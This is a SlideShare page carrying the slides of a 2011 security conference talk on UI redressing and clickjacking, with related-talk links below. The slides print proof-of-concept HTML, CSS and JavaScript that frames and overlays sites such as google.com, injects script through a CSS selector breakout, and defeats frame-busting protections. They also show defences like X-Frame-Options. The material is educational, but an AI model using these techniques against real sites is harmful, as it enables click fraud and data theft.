SlideShare uma empresa Scribd logo

Marcus Niemietz - UI Redressing and Clickjacking About click fraud and data theft

DefconRussia
DefconRussia

International Security Conference "ZeroNights 2011" - http://www.zeronights.org/

TecnologiaArte e fotografia
1 de 41
Baixar para ler offline
Introduction Attack vectors Counteractive measures Conclusion and outlook UI Redressing and Clickjacking: About click fraud and data theft Marcus Niemietz marcus.niemietz@rub.de Ruhr-University Bochum Chair for Network and Data Security 25th of November 2011 Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction Attack vectors Counteractive measures Conclusion and outlook Short and crisp details about me Studying “IT-Security/Information Technology”, RUB “Computer Science”, Distance University Hagen B.Sc. in “IT-Security/Information Technology” Books Authentication Web Pages with Selenium ≥Feb. 2012: Clickjacking und UI-Redressing International speaker Work: RUB, Pixelboxx, ISP and IT-Security, Freelancer (trainings, penetration tests) Twitter: @mniemietz Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction Attack vectors Counteractive measures Conclusion and outlook Contents 1 Introduction UI redressing Clickjacking 2 Attack vectors UI redressing Round up Clickjacking Tool 3 Counteractive measures Frame busting Busting frame busting Clickjacking statistics 4 Conclusion and outlook Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction Attack vectors UI redressing Counteractive measures Clickjacking Conclusion and outlook Introduction Google Inc. can generate a profit of over $8.5 billion in 2010 Interesting for commercial companies to offer web applications shopping banking share status messages New attacks available that can bypass existing protection mechanisms CSRF token via Clickjacking Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction Attack vectors UI redressing Counteractive measures Clickjacking Conclusion and outlook Introduction Oh no! Why Clickjacking, why again? Because there is more in it! Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction Attack vectors UI redressing Counteractive measures Clickjacking Conclusion and outlook UI redressing Adjust the look and/or behavior of a web page UI redressing Clickjacking Strokejacking Text injection by drag-and-drop Content extraction Pop-up blocker bypass SVG masking Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction Attack vectors UI redressing Counteractive measures Clickjacking Conclusion and outlook Clickjacking A known issue since 2002 Officially introduced by Hansen & Grossman in 2008 Clickjacking ⊂ UI redressing Cursorjacking Filejacking, Cookiejacking Likejacking, Sharejacking Eventjacking, Classjacking Tapjacking, Tabnapping Adobe Flash Player attacks Combinations with CSRF, XSS, CSS Clickjacking ⇔ Classic clickjacking = UI redressing Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Attack vectors Classic clickjacking Advanced attacks Clickjacking and XSS Clickjacking and CSS Strokejacking Text injection by drag-and-drop Content extraction Cursorjacking SVG masking What an attacker can do Clickjacking tool Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Classic clickjacking Practical example Clickjacking on the google.com “Sign out” link Three files required inner.html 1 < iframe src =" http :// www . google . com " width ="2000" height ="2000" scrolling =" no " frameborder =" none " > 2 </ iframe > Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Classic clickjacking Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Classic clickjacking clickjacking.html 1 < iframe id =" inner " src =" inner . html " width ="2005" height ="290" scrolling =" no " frameborder =" none " > </ iframe > 2 < style type =" text / css " > <! - - 3 # inner { position : absolute ; left : -1955 px ; top : -14 px ;} 4 // - - > </ style > Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Classic clickjacking trustedPage.html 1 <h1 > www . nds . rub . de </ h1 > 2 < form action =" http :// www . nds . rub . de " > 3 < input type =" submit " value =" Go " > 4 </ form > 5 6 < iframe id =" clickjacking " src =" clickjacking . html " width ="50" height ="300" scrolling =" no " frameborder =" none " > 7 </ iframe > 8 < style type =" text / css " > <! - - 9 # clickjacking { position : absolute ; left :7 px ; top :81 px ; opacity :0.0} 10 // - - > </ style > Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Classic clickjacking 1 “inner.html”: Frame “google.com” (2000x2000px) 2 “clickjacking.html”: Shift the iframe with “src=inner.html” to the left 3 “trustedPage.html”: Place a transparent iframe with “src=clickjacking.html” over the “Go” button Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Clickjacking and XSS: Classjacking Makes use of the jQuery JavaScript Library Simplifies HTML event handling Truncated classjacking.html (Part 1/2) 1 < span class = foo > Some text </ span > 2 <a class = bar href =" http :// www . nds . rub . de " > 3 www . nds . rub . de 4 </a > 5 6 < script src =" http :// code . jquery . com / jquery -1.4.4. js " > 7 </ script > Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Clickjacking and XSS: Classjacking Truncated classjacking.html (Part 2/2) 1 < script > 2 $ (" span . foo ") . click ( function () { 3 alert ( ’ foo ’) ; 4 $ (" a . bar ") . click () ; 5 }) ; 6 $ (" a . bar ") . click ( function () { 7 alert ( ’ bar ’) ; 8 location =" http :// www . example . org "; 9 }) ; 10 </ script > Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Clickjacking and CSS: Whole-page clickjacking CSS offers the option to use attribute selectors to select elements with specific attributes CSS attribute selector code 1 a [ href = http :// www . example . org /] { 2 font - weight : bold ; 3 } Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Clickjacking and CSS: Whole-page clickjacking Opera allows for breaking out of attribute selectors Opera 11: -o-link applies for <a> tags Whole-page clickjacking code 1 < style > 2 p [ foo = bar {}*{ - o - link : ’ javascript : alert (1) ’}{}*{ - o - link - source : current }]{ 3 color : red ; 4 } 5 </ style > “-o-link-source” is used to specify the source anchor for the element with the value “current” to use the current value of “-o-link” Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Strokejacking Introduced by Michal Zalewski in 2010 Uses the focus functionality An iframe (src=“google.com”) together with a text field The web browser has to choose between the “iframe” and “input” tag Word “opportunity” to provide a human authentication service “p”, “o”, “r” and “n” Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Text injection by drag-and-drop Data can be dragged across a domain No need to care about the SOP dragAndDrop.html 1 < div draggable =" true " ondragstart =" event . dataTransfer . setData ( t e x t / p l a i n , malicious c o d e ) ;" > 2 <h1 > Drop me </ h1 > 3 </ div > 4 < iframe src =" dr agAndD ropIfr ame . html " style =" border :1 px solid ;" frameborder =" yes " > 5 </ iframe > Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Content extraction contentExtraction.html 1 < iframe src =" view - source : http :// www . nds . rub . de / chair / news /" frameborder ="0" style =" width :400 px ; height :180 px " > 2 </ iframe > 3 < textarea type =" text " cols ="50" rows ="10" > 4 </ textarea > Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Cursorjacking Introduced by Eddy Bordi in 2010 Change the default cursor icon for a new behavior CSS code to change the cursor 1 cursor : url (" pointer2visible . png ") , default ; Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook SVG masking Truncated SVGMasking.html 1 < svg : rect x ="0.0" y ="0.0" width ="0.373" height ="0.3" fill =" white "/ > 2 < svg : circle cx ="0.45" cy ="0.7" r ="0.075" fill =" white "/ > Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Round up What an attacker can do with UI redressing Stealing cookies Stealing all the files of a folder Stealing files from the intranet or e.g. tokens Sending status messages in your name Showing elements in another context Controlling your addon(s) on mobile devices Many more Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction UI redressing Attack vectors Round up Counteractive measures Clickjacking Tool Conclusion and outlook Clickjacking Tool Introduced by Stone at the Black Hat Europe in 2010 Visualize clickjacking techniques in practice Download: http://www.contextis.com/research/tools/ clickjacking-tool/ Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction Frame busting Attack vectors Busting frame busting Counteractive measures Clickjacking statistics Conclusion and outlook Counteractive measures Frame busting JavaScript X-Frame-Options NoScript Busting frame busting IE8 XSS filter Disabling JavaScript: Restricted frames Redefining location Clickjacking detection system X-FRAME-OPTIONS Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction Frame busting Attack vectors Busting frame busting Counteractive measures Clickjacking statistics Conclusion and outlook JavaScript Structure of frame busting code conditional statement counter-action Frame busting code 1 if ( top != self ) { 2 top . location . href = self . location . href ; 3 } Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction Frame busting Attack vectors Busting frame busting Counteractive measures Clickjacking statistics Conclusion and outlook JavaScript By Rydstedt et al. - Alexa Top 500 checked Unique sites Conditional statement 38% if (top != self) 22.5% if (top.location != self.location) 13.5% if (top.location != location) 8% if (parent.frames.length > 0) Unique sites Counter-action 7 top.location = self.location 4 top.location.href = document.location.href 3 top.location.href = self.location.href 3 top.location.replace(self.location) Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction Frame busting Attack vectors Busting frame busting Counteractive measures Clickjacking statistics Conclusion and outlook X-Frame-Options Introduced by Microsoft in 2008 Two possible values DENY: Web page cannot be loaded by a frame SAMEORIGIN: Display the web page in a frame when the origin of the top level-browsing-context is not different PHP implementation 1 <? php 2 header (" X - Frame - Options : DENY ") ; 3 ?> Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction Frame busting Attack vectors Busting frame busting Counteractive measures Clickjacking statistics Conclusion and outlook X-Frame-Options Firefox: NoScript had experimental X-FRAME-OPTIONS compatibility support in version “1.8.9.9” Browser Lowest version Internet Explorer 8.0 Firefox (Gecko) 3.6.9 (1.9.2.9) Opera 10.50 Safari 4.0 Chrome 4.1.249.1042 Interesting: Content Security Policy (≥Firefox 4) Enables a site to specify which sites may embed a resource frame-ancestors: Valid sources for <frame> and <iframe> Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction Frame busting Attack vectors Busting frame busting Counteractive measures Clickjacking statistics Conclusion and outlook NoScript Extension for mozilla-based web browsers like Firefox Clickjacking protection integrated Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction Frame busting Attack vectors Busting frame busting Counteractive measures Clickjacking statistics Conclusion and outlook Busting frame busting In the case that JavaScript protection mechanism are used Busting frame busting Mobile versus non-mobile applications Double framing onBeforeUnload event XSS filter Restricted frames Redefining location Referrer checking Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction Frame busting Attack vectors Busting frame busting Counteractive measures Clickjacking statistics Conclusion and outlook IE8 XSS Filter Frame busting code 1 < script type =" text / javascript " > 2 if ( parent . frames . length > 0) { 3 top . location . replace ( document . location ) ; 4 } 5 </ script > IFRAME with IE8 XSS Filter 1 < iframe src =" http :// www . example . org /? abc =%3 Cscript %20 type =%22 text / javascript %22%3 Eif "> 2 </ iframe > Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction Frame busting Attack vectors Busting frame busting Counteractive measures Clickjacking statistics Conclusion and outlook Redefining location In IE7+ it is possible to redefine “location” By defining “location” as a variable, a reading or navigation by assigning “top.location” will fail, due to a security violation Redefining “location” to deactivate frame busting code 1 < script > 2 var location = " dummy "; 3 </ script > 4 < iframe src =" http :// www . example . org " > 5 </ iframe > Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction Frame busting Attack vectors Busting frame busting Counteractive measures Clickjacking statistics Conclusion and outlook Clickjacking Defense Published by August Detlefsen, Jason Li, Chris Schmidt, and Brendon Crawford Clickjacking Defense 1 < style id =" aCJ " > body { display : none } </ style > 2 < script type =" text / javascript " > 3 if ( self === top ) { 4 var aCJ = document . getElementByID (" aCJ ") ; 5 aCJ . parentNode . removeChild ( aCJ ) ; 6 } else { 7 top . location = self . location ; 8 } 9 </ script > Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction Frame busting Attack vectors Busting frame busting Counteractive measures Clickjacking statistics Conclusion and outlook Clickjacking detection system Value Rate Visited Pages 1,065,482 100 % Unreachable or Empty 86,799 8.15% Valid Pages 978,683 91.85% With IFRAMEs 368,963 31,70% With FRAMEs 32,296 3.30% Transparent (I)FRAMEs 1,557 0.16% Clickable Elements 143,701,194 146.83 el./page Speed Performance 71 days 15,006 pages/day Total True Positives Borderlines False Positives ClickIDS 137 2 5 130 NoScript 535 2 31 502 Both 6 2 0 4 Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction Frame busting Attack vectors Busting frame busting Counteractive measures Clickjacking statistics Conclusion and outlook X-FRAME-OPTIONS Alexa Top 100,000 scanned in February 2011 HTTP Header analysis of the first page Value Rate Not scanned 341 0.34% Top 100 3 3.00% Top 1,000 9 0.90% Top 10,000 33 0.33% Top 100,000 143 0.14% DENY 48 33.57% SAMEORIGIN 95 66.43% Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction Attack vectors Counteractive measures Conclusion and outlook Conclusion and outlook UI redressing is a serious attack that can have terrible effects There are protection mechanisms like frame busting to provide a certain degree of client-side security It is possible to disable frame busting code X-Frame-Options and NoScript should be used There will be more attacks concerning UI redressing Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction Attack vectors Counteractive measures Conclusion and outlook Bibliography Marcus Niemietz, “UI Redressing: Attacks and Countermeasures Revisited”, Jan. 2011, http://ui-redressing.mniemietz.de Jesse Ruderman, “Bug 154957 - iframe content background defaults to transparent”, Jun. 2002, https: //bugzilla.mozilla.org/show_bug.cgi?id=154957 Robert Hansen, Jeremiah Grossman, “Clickjacking”, Dec. 2008, http://www.sectheory.com/clickjacking.htm Paul Stone, “Clickjacking Paper - Black Hat 2010” Apr. 2010, http://www.contextis.co.uk/resources/ white-papers/clickjacking/ Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction Attack vectors Counteractive measures Conclusion and outlook Bibliography Krzysztof Kotowicz, “Filejacking: How to make a file server from your browser (with HTML5 of course)”, May 2011, http://blog.kotowicz.net/2011/04/ how-to-make-file-server-from-your.html Mario Heiderich, “Opera whole-page click hijacking via CSS”, May 2011, http://html5sec.org/#27 G. Rydstedt, E. Bursztein, D. Boneh, and C. Jackson, “Busting frame busting: a study of clickjacking vulnerabilities at popular sites” in IEEE Oakland Web 2.0 Security and Privacy, 2010, http://seclab.stanford.edu/websec/framebusting/ Giorgio Maone, “NoScript - JavaScript/Java/Flash blocker for a safer Firefox experience”, Apr. 2011, http://noscript.net Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction Attack vectors Counteractive measures Conclusion and outlook Bibliography Brandon Sterne, “Content Security Policy”, Apr. 2011, http://people.mozilla.com/~bsterne/ content-security-policy/ Mozilla Developer Network, “The X-Frame-Options response header”, Apr. 2011, https://developer.mozilla.org/en/ The_X-FRAME-OPTIONS_response_header Marco Balduzzi, Manuel Egele, Engin Kirda, Davide Balzarotti, Christopher Kruegel, “A Solution for the Automated Detection of Clickjacking Attacks”, Apr. 2010, http: //www.iseclab.org/papers/asiaccs122-balduzzi.pdf August Detlefsen, Jason Li, Chris Schmidt, Brendon Crawford, “Clickjacking Defense”, May 2011, https://www.codemagi.com/blog/post/194 Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking
Introduction Attack vectors Counteractive measures Conclusion and outlook End Thank you for your attention. Any questions? Marcus Niemietz, RUB @Zeronights UI Redressing and Clickjacking

Recomendados

New Insights into Clickjacking
New Insights into ClickjackingNew Insights into Clickjacking
New Insights into ClickjackingMarco Balduzzi
 
Clickjacking Attack
Clickjacking AttackClickjacking Attack
Clickjacking AttackTùng Hà Sơn
 
Click jacking
Click jacking Click jacking
Click jacking Faysal Hossain Shezan
 
Alexey lukatsky - Boston cybercrime matrix or what is the business model of ...
Alexey lukatsky - Boston cybercrime matrix or what is the business model of ...Alexey lukatsky - Boston cybercrime matrix or what is the business model of ...
Alexey lukatsky - Boston cybercrime matrix or what is the business model of ...DefconRussia
 
Anton Karpov - Black and white world of information security
Anton Karpov - Black and white world of information securityAnton Karpov - Black and white world of information security
Anton Karpov - Black and white world of information securityDefconRussia
 
Alexey Krasnov - We all meandered through our schooling haphazardly
Alexey Krasnov - We all meandered through our schooling haphazardlyAlexey Krasnov - We all meandered through our schooling haphazardly
Alexey Krasnov - We all meandered through our schooling haphazardlyDefconRussia
 
Fyodor Yarochkin - Dissecting unlawful Internet activities
Fyodor Yarochkin - Dissecting unlawful Internet activitiesFyodor Yarochkin - Dissecting unlawful Internet activities
Fyodor Yarochkin - Dissecting unlawful Internet activitiesDefconRussia
 
Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs...
Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs...Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs...
Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs...DefconRussia
 

Recomendados

New Insights into Clickjacking
New Insights into ClickjackingNew Insights into Clickjacking
New Insights into ClickjackingMarco Balduzzi
 
Clickjacking Attack
Clickjacking AttackClickjacking Attack
Clickjacking AttackTùng Hà Sơn
 
Click jacking
Click jacking Click jacking
Click jacking Faysal Hossain Shezan
 
Alexey lukatsky - Boston cybercrime matrix or what is the business model of ...
Alexey lukatsky - Boston cybercrime matrix or what is the business model of ...Alexey lukatsky - Boston cybercrime matrix or what is the business model of ...
Alexey lukatsky - Boston cybercrime matrix or what is the business model of ...DefconRussia
 
Anton Karpov - Black and white world of information security
Anton Karpov - Black and white world of information securityAnton Karpov - Black and white world of information security
Anton Karpov - Black and white world of information securityDefconRussia
 
Alexey Krasnov - We all meandered through our schooling haphazardly
Alexey Krasnov - We all meandered through our schooling haphazardlyAlexey Krasnov - We all meandered through our schooling haphazardly
Alexey Krasnov - We all meandered through our schooling haphazardlyDefconRussia
 
Fyodor Yarochkin - Dissecting unlawful Internet activities
Fyodor Yarochkin - Dissecting unlawful Internet activitiesFyodor Yarochkin - Dissecting unlawful Internet activities
Fyodor Yarochkin - Dissecting unlawful Internet activitiesDefconRussia
 
Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs...
Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs...Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs...
Alexander Matrosov, Eugene Rodionov - Modern technologies in malware programs...DefconRussia
 
Denis Baranov - Root via XSS
Denis Baranov - Root via XSSDenis Baranov - Root via XSS
Denis Baranov - Root via XSSDefconRussia
 
Ivan Medvedev - Security Development Lifecycle Tools
Ivan Medvedev - Security Development Lifecycle ToolsIvan Medvedev - Security Development Lifecycle Tools
Ivan Medvedev - Security Development Lifecycle ToolsDefconRussia
 
Fast dynamic analysis, Kostya Serebryany
Fast dynamic analysis, Kostya SerebryanyFast dynamic analysis, Kostya Serebryany
Fast dynamic analysis, Kostya Serebryanyyaevents
 
HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...
HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...
HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...Marco Balduzzi
 
Cybercrime in the Deep Web (BHEU 2015)
Cybercrime in the Deep Web (BHEU 2015)Cybercrime in the Deep Web (BHEU 2015)
Cybercrime in the Deep Web (BHEU 2015)Marco Balduzzi
 
Avian flu Type A-H5N1 epidemiological model: Puerto Rico as a case study
Avian flu Type A-H5N1 epidemiological model: Puerto Rico as a case studyAvian flu Type A-H5N1 epidemiological model: Puerto Rico as a case study
Avian flu Type A-H5N1 epidemiological model: Puerto Rico as a case studyMariangeles Rivera
 
Pentru tine
Pentru tinePentru tine
Pentru tineMircea Tivadar
 
Adauga un text
Adauga un textAdauga un text
Adauga un textCodruta Ardelean
 
TUGAS PTI MOTHERBOARD DAN MODEM
TUGAS PTI MOTHERBOARD DAN MODEMTUGAS PTI MOTHERBOARD DAN MODEM
TUGAS PTI MOTHERBOARD DAN MODEMika aprilia
 
A New Form of Dos attack in Cloud
A New Form of Dos attack in CloudA New Form of Dos attack in Cloud
A New Form of Dos attack in CloudSanoj Kumar
 
Family tree
Family treeFamily tree
Family treebogomolova1879
 
Possessive adjectives
Possessive adjectivesPossessive adjectives
Possessive adjectivesbogomolova1879
 
Christmas
ChristmasChristmas
Christmasbogomolova1879
 
Personal informatic
Personal informaticPersonal informatic
Personal informaticXavier Puig de las Heras
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
 
Softworx Enterprise Asset Management 101 - Presentation Template
Softworx Enterprise Asset Management 101 - Presentation TemplateSoftworx Enterprise Asset Management 101 - Presentation Template
Softworx Enterprise Asset Management 101 - Presentation TemplateEnterprise Softworx Solutions
 
Why AIS is not always enough
Why AIS is not always enoughWhy AIS is not always enough
Why AIS is not always enoughPole Star Space Applications
 
HTTP(S)-Based Clustering for Assisted Cybercrime Investigations
HTTP(S)-Based Clustering for Assisted Cybercrime Investigations HTTP(S)-Based Clustering for Assisted Cybercrime Investigations
HTTP(S)-Based Clustering for Assisted Cybercrime InvestigationsMarco Balduzzi
 
600.412.Lecture02
600.412.Lecture02600.412.Lecture02
600.412.Lecture02ragibhasan
 
Cctk support for setting hdd password
Cctk support for setting hdd passwordCctk support for setting hdd password
Cctk support for setting hdd passwordartisriva
 
Paper: A Solution for the Automated Detection of Clickjacking Attacks
Paper: A Solution for the Automated Detection of Clickjacking AttacksPaper: A Solution for the Automated Detection of Clickjacking Attacks
Paper: A Solution for the Automated Detection of Clickjacking AttacksMarco Balduzzi
 
By the Book: Examining the Art of Building Great User Experiences in Software
By the Book: Examining the Art of Building Great User Experiences in SoftwareBy the Book: Examining the Art of Building Great User Experiences in Software
By the Book: Examining the Art of Building Great User Experiences in SoftwareEffectiveUI
 

Mais conteúdo relacionado

Destaque

Denis Baranov - Root via XSS
Denis Baranov - Root via XSSDenis Baranov - Root via XSS
Denis Baranov - Root via XSSDefconRussia
 
Ivan Medvedev - Security Development Lifecycle Tools
Ivan Medvedev - Security Development Lifecycle ToolsIvan Medvedev - Security Development Lifecycle Tools
Ivan Medvedev - Security Development Lifecycle ToolsDefconRussia
 
Fast dynamic analysis, Kostya Serebryany
Fast dynamic analysis, Kostya SerebryanyFast dynamic analysis, Kostya Serebryany
Fast dynamic analysis, Kostya Serebryanyyaevents
 
HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...
HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...
HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...Marco Balduzzi
 
Cybercrime in the Deep Web (BHEU 2015)
Cybercrime in the Deep Web (BHEU 2015)Cybercrime in the Deep Web (BHEU 2015)
Cybercrime in the Deep Web (BHEU 2015)Marco Balduzzi
 
Avian flu Type A-H5N1 epidemiological model: Puerto Rico as a case study
Avian flu Type A-H5N1 epidemiological model: Puerto Rico as a case studyAvian flu Type A-H5N1 epidemiological model: Puerto Rico as a case study
Avian flu Type A-H5N1 epidemiological model: Puerto Rico as a case studyMariangeles Rivera
 
TUGAS PTI MOTHERBOARD DAN MODEM
TUGAS PTI MOTHERBOARD DAN MODEMTUGAS PTI MOTHERBOARD DAN MODEM
TUGAS PTI MOTHERBOARD DAN MODEMika aprilia
 
A New Form of Dos attack in Cloud
A New Form of Dos attack in CloudA New Form of Dos attack in Cloud
A New Form of Dos attack in CloudSanoj Kumar
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
 
Softworx Enterprise Asset Management 101 - Presentation Template
Softworx Enterprise Asset Management 101 - Presentation TemplateSoftworx Enterprise Asset Management 101 - Presentation Template
Softworx Enterprise Asset Management 101 - Presentation TemplateEnterprise Softworx Solutions
 
HTTP(S)-Based Clustering for Assisted Cybercrime Investigations
HTTP(S)-Based Clustering for Assisted Cybercrime Investigations HTTP(S)-Based Clustering for Assisted Cybercrime Investigations
HTTP(S)-Based Clustering for Assisted Cybercrime InvestigationsMarco Balduzzi
 
600.412.Lecture02
600.412.Lecture02600.412.Lecture02
600.412.Lecture02ragibhasan
 
Cctk support for setting hdd password
Cctk support for setting hdd passwordCctk support for setting hdd password
Cctk support for setting hdd passwordartisriva
 

Destaque (20)

Denis Baranov - Root via XSS
Denis Baranov - Root via XSSDenis Baranov - Root via XSS
Denis Baranov - Root via XSS
 
Ivan Medvedev - Security Development Lifecycle Tools
Ivan Medvedev - Security Development Lifecycle ToolsIvan Medvedev - Security Development Lifecycle Tools
Ivan Medvedev - Security Development Lifecycle Tools
 
Fast dynamic analysis, Kostya Serebryany
Fast dynamic analysis, Kostya SerebryanyFast dynamic analysis, Kostya Serebryany
Fast dynamic analysis, Kostya Serebryany
 
HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...
HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...
HITB2012AMS - SatanCloud: A Journey Into the Privacy and Security Risks of Cl...
 
Cybercrime in the Deep Web (BHEU 2015)
Cybercrime in the Deep Web (BHEU 2015)Cybercrime in the Deep Web (BHEU 2015)
Cybercrime in the Deep Web (BHEU 2015)
 
Avian flu Type A-H5N1 epidemiological model: Puerto Rico as a case study
Avian flu Type A-H5N1 epidemiological model: Puerto Rico as a case studyAvian flu Type A-H5N1 epidemiological model: Puerto Rico as a case study
Avian flu Type A-H5N1 epidemiological model: Puerto Rico as a case study
 
Pentru tine
Pentru tinePentru tine
Pentru tine
 
Adauga un text
Adauga un textAdauga un text
Adauga un text
 
TUGAS PTI MOTHERBOARD DAN MODEM
TUGAS PTI MOTHERBOARD DAN MODEMTUGAS PTI MOTHERBOARD DAN MODEM
TUGAS PTI MOTHERBOARD DAN MODEM
 
A New Form of Dos attack in Cloud
A New Form of Dos attack in CloudA New Form of Dos attack in Cloud
A New Form of Dos attack in Cloud
 
Family tree
Family treeFamily tree
Family tree
 
Possessive adjectives
Possessive adjectivesPossessive adjectives
Possessive adjectives
 
Christmas
ChristmasChristmas
Christmas
 
Personal informatic
Personal informaticPersonal informatic
Personal informatic
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
 
Softworx Enterprise Asset Management 101 - Presentation Template
Softworx Enterprise Asset Management 101 - Presentation TemplateSoftworx Enterprise Asset Management 101 - Presentation Template
Softworx Enterprise Asset Management 101 - Presentation Template
 
Why AIS is not always enough
Why AIS is not always enoughWhy AIS is not always enough
Why AIS is not always enough
 
HTTP(S)-Based Clustering for Assisted Cybercrime Investigations
HTTP(S)-Based Clustering for Assisted Cybercrime Investigations HTTP(S)-Based Clustering for Assisted Cybercrime Investigations
HTTP(S)-Based Clustering for Assisted Cybercrime Investigations
 
600.412.Lecture02
600.412.Lecture02600.412.Lecture02
600.412.Lecture02
 
Cctk support for setting hdd password
Cctk support for setting hdd passwordCctk support for setting hdd password
Cctk support for setting hdd password
 

Semelhante a Marcus Niemietz - UI Redressing and Clickjacking About click fraud and data theft

Paper: A Solution for the Automated Detection of Clickjacking Attacks
Paper: A Solution for the Automated Detection of Clickjacking AttacksPaper: A Solution for the Automated Detection of Clickjacking Attacks
Paper: A Solution for the Automated Detection of Clickjacking AttacksMarco Balduzzi
 
By the Book: Examining the Art of Building Great User Experiences in Software
By the Book: Examining the Art of Building Great User Experiences in SoftwareBy the Book: Examining the Art of Building Great User Experiences in Software
By the Book: Examining the Art of Building Great User Experiences in SoftwareEffectiveUI
 
By the Book: Examining the Art of Building Great User Experiences in Software
By the Book: Examining the Art of Building Great User Experiences in SoftwareBy the Book: Examining the Art of Building Great User Experiences in Software
By the Book: Examining the Art of Building Great User Experiences in SoftwareEffective
 
Koopman Prize Presentation
Koopman Prize PresentationKoopman Prize Presentation
Koopman Prize PresentationLinan Huang
 
